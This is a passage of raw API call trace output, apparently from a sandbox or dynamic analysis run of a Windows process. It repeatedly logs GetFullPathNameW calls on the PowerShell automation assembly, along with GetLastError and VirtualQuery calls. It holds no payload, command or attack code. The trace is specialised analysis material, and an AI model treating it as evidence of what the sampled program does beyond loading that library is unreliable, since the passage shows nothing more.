lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdb98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.460] GetLastError () returned 0x0 [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.461] VirtualQuery (in: lpAddress=0x2cd664, lpBuffer=0x2ce664, dwLength=0x1c | out: lpBuffer=0x2ce664*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.461] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.462] GetLastError () returned 0x0 [0054.462] VirtualQuery (in: lpAddress=0x2cd664, lpBuffer=0x2ce664, dwLength=0x1c | out: lpBuffer=0x2ce664*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.463] GetLastError () returned 0x0 [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] VirtualQuery (in: lpAddress=0x2cd664, lpBuffer=0x2ce664, dwLength=0x1c | out: lpBuffer=0x2ce664*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.464] GetLastError () returned 0x0 [0054.464] VirtualQuery (in: lpAddress=0x2cd664, lpBuffer=0x2ce664, dwLength=0x1c | out: lpBuffer=0x2ce664*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.465] GetLastError () returned 0x0 [0054.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.465] GetLastError () returned 0x0 [0054.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.465] GetLastError () returned 0x0 [0054.465] VirtualQuery (in: lpAddress=0x2cd294, lpBuffer=0x2ce294, dwLength=0x1c | out: lpBuffer=0x2ce294*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.465] VirtualQuery (in: lpAddress=0x2cd2d0, lpBuffer=0x2ce2d0, dwLength=0x1c | out: lpBuffer=0x2ce2d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.466] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.466] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.466] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.467] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.467] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.467] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.467] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.467] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.467] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.467] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.468] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.468] VirtualQuery (in: lpAddress=0x2cd43c, lpBuffer=0x2ce43c, dwLength=0x1c | out: lpBuffer=0x2ce43c*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.468] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.468] VirtualQuery (in: lpAddress=0x2cd5d4, lpBuffer=0x2ce5d4, dwLength=0x1c | out: lpBuffer=0x2ce5d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.468] VirtualQuery (in: lpAddress=0x2cd598, lpBuffer=0x2ce598, dwLength=0x1c | out: lpBuffer=0x2ce598*(BaseAddress=0x2cd000, 